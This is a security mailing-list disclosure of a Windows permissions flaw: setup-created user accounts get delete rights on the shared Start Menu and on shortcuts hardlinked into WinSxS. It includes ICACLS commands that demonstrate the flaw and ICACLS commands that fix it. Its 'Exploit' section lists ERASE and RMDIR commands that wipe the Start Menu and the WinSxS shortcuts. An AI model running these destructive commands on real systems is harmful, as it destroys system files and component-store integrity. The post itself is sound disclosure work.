Hi @ll, the following is a condensed form of <https://skanthak.hier-im-netz.de/whispers.html#whisper3> and <https://skanthak.hier-im-netz.de/whispers.html#whisper4>.
Windows Vista moved the shared start menu from "%ALLUSERSPROFILE%\Start Menu\" to "%ProgramData%\Microsoft\Windows\Start Menu\", with some shortcuts (*.lnk) "reflected" from the (immutable) component store below %SystemRoot%\WinSxS\ JFTR: "reflection" is M$FT lingo for hardlink into the component store. Before this move only Administrators had write access to the shared start menu; afterwards at least the user account(s) created during Windows setup (OOBE, out of box experience) are granted DELETE and DELETE_CHILD access permission. Demonstration ~~~~~~~~~~~~~ Log on to an arbitrary (unprivileged) user account, start the command processor and run the following command line to display the access permissions of the shared start menu: ICACLS.EXE "%ProgramData%\Microsoft\Windows\Start Menu" | C:\ProgramData\Microsoft\Windows\Start Menu COMPUTER\User:(OI)(CI)(IO)(DE,DC) | S-1-5-21-xxx-yyy-zzz-1000:(OI)(CI)(IO)(DE,DC) | COMPUTER\Administrator:(OI)(CI)(IO)(DE,DC) | NT AUTHORITY\SYSTEM:(I)(OI)(CI)(F) | BUILTIN\Administrators:(I)(OI)(CI)(F) | BUILTIN\Users:(I)(OI)(CI)(RX) | Everyone:(I)(OI)(CI)(RX) Instead of "COMPUTER" you get your computer name (see the environment variables %COMPUTERNAME% and %USERDOMAIN%); instead of "User" and "Administrator" you get the first/primary and the localized administrator account name. "(OI)(CI)(IO)(DE,DC)" means "inherit DELETE and DELETE CHILD access permission to all objects/files and containers/directories below this directory". Run the following command line to confirm the latter: ICACLS.EXE "%ProgramData%\Microsoft\Windows\Start Menu" /C /Q /T | FINDSTR.EXE /L "%ProgramData% (DE,DC)" "Thanks" to the braindead "reflection" of shortcuts (generally: files) from the component store their access permissions are changed too: ICACLS.EXE "%SystemRoot%\WinSxS\*.lnk" /C /Q /T | FINDSTR.EXE /L "%SystemRoot% (DE,DC)" Exploit ~~~~~~~ "Thanks" to the DELETE_CHILD access permission some unprivileged users can since NINETEEN years remove the shared start menu COMPLETELY! ERASE /A:HS /F /Q /S "%ProgramData%\Microsoft\Windows\Start Menu\desktop.ini" ERASE /F /Q /S "%ProgramData%\Microsoft\Windows\Start Menu\*.lnk" RMDIR /Q /S "%ProgramData%\Microsoft\Windows\Start Menu" "Thanks" to the braindead "reflection" of shortcuts (generally: files) from the component store the same unprivileged users can also erase them there and destroy the integrity of the component store: ERASE /F /Q /S "%SystemRoot%\WinSxS\*.lnk" Fix ~~~ Remove the SUPERFLUOUS access permissions (needs SE_RESTORE_PRIVILEGE): ICACLS.EXE "%ProgramData%\Microsoft\Windows\Start Menu" /C /Q /Remove:g "%USERDOMAIN%\Administrator" "%USERDOMAIN%\%USERNAME%" "%USERDOMAIN%\User" *S-1-5-21-xxx-yyy-zzz-RID ... /T ICACLS.EXE "%SystemRoot%\WinSxS\*.lnk" /C /Q /Remove:g "%USERDOMAIN%\Administrator" "%USERDOMAIN%\%USERNAME%" "%USERDOMAIN%\User" *S-1-5-21-xxx-yyy-zzz-RID ... /T stay tuned, and far away from unprotected system( file)s Stefan Kanthak _______________________________________________ Sent through the Full Disclosure mailing list https://nmap.org/mailman/listinfo/fulldisclosure Web Archives & RSS: https://seclists.org/fulldisclosure/
